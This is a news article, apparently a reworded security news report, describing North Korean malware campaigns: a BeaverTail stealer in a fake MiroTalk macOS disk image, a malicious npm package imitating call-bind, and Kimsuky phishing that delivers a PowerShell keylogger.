North Korean Cybercriminals Enhance BeaverTail Malicious Software to Aim MacOS Users
Cybersecurity experts have unveiled a modernized version of a recognized thieving software that cyber attackers linked with the Democratic People’s Republic of Korea (DPRK) have distributed in past cyber spying campaigns focusing on individuals searching for employment opportunities.
The item in discussion is an Apple macOS disk image (DMG) file dubbed “MiroTalk.dmg” that imitates the authentic video calling service of the same designation, however, in actuality, it serves as a channel to deploy a native edition of BeaverTail, cybersecurity researcher Patrick Wardle stated.
BeaverTail mentions a JavaScript thieving software that was initially delineated by Palo Alto Networks Unit 42 in November 2023 as part of an operation dubbed Contagious Interview that aims to infect software developers with malicious software through an assumed job interview procedure. Securonix is monitoring the same operation under the alias DEV#POPPER.
In addition to extracting sensitive data from internet browsers and digital currency wallets, the software can dispatch further payloads like InvisibleFerret, a Python backdoor tasked with downloading AnyDesk for constant remote accessibility.
Although BeaverTail has been circulated through counterfeit npm packages stored on GitHub and the npm package registry, the latest discoveries represent a shift in the distribution mechanism.
“If I had to speculate, the DPRK cybercriminals likely approached their possible targets, urging them to participate in a hiring meeting, by downloading and executing the (infected version of) MiroTalk hosted on mirotalk[.]net,” Wardle expressed.
An evaluation of the unsigned DMG document indicates that it aids in the theft of data from web browsers like Google Chrome, Brave, and Opera, digital currency wallets, and iCloud Keychain. Moreover, it’s constructed to download and execute supplemental Python scripts from a remote server (i.e., InvisibleFerret).
“The DPRK cybercriminals are a crafty group and are quite skilled at compromising macOS targets, even though their method frequently relies on social engineering (and thus from a technical perspective are somewhat unremarkable),” Wardle mentioned.
The revelation emerges as Phylum detected a fresh malicious npm package labelled call-blockflow that’s almost indistinguishable from the legitimate call-bind but incorporates intricate functionality to download a remote executable file while making conscientious efforts to avoid detection.
“In this attack, although the call-bind package has not been compromised, the weaponized call-blockflow package appropriates all the credibility and legitimacy of the original to enhance the attack’s success,” it conveyed in a statement shared with The Hacker News.
The package, suspected to be the creation of the North Korea-affiliated Lazarus Group and withdrawn about ninety minutes after its upload to npm, garnered a total of 18 downloads. Evidence implies that the event, comprising over three dozen malicious packages, has been occurring periodically since September 2023.
“Subsequent to installation, these packages would fetch a remote file, decrypt it, execute an exported function from it, and then meticulously erase their tracks by deleting and renaming files,” the software supply chain security firm mentioned. “This left the package directory in a seemingly benign state after installation.”
Furthermore, it follows a cautionary notice from JPCERT/CC, alerting about cyber assaults orchestrated by the North Korean Kimsuky group targeting Japanese entities.
The infiltration operation commences with phishing messages impersonating security and diplomatic organizations, and contain a harmful executable that, upon execution, prompts the download of a Visual Basic Script (VBS), which, subsequently, retrieves a PowerShell script to accumulate user account, system and network information in addition to enumerate files and processes.
The collected details are then sent to a command-and-control (C2) server, which sends back a second VBS file that’s then executed to fetch and execute a PowerShell-driven keystroke logger named InfoKey.
“Even though there have been limited reports of attack endeavors by Kimsuky aiming at organizations in Japan, there is a likelihood that Japan is also under active targeting,” JPCERT/CC stated.
About Author
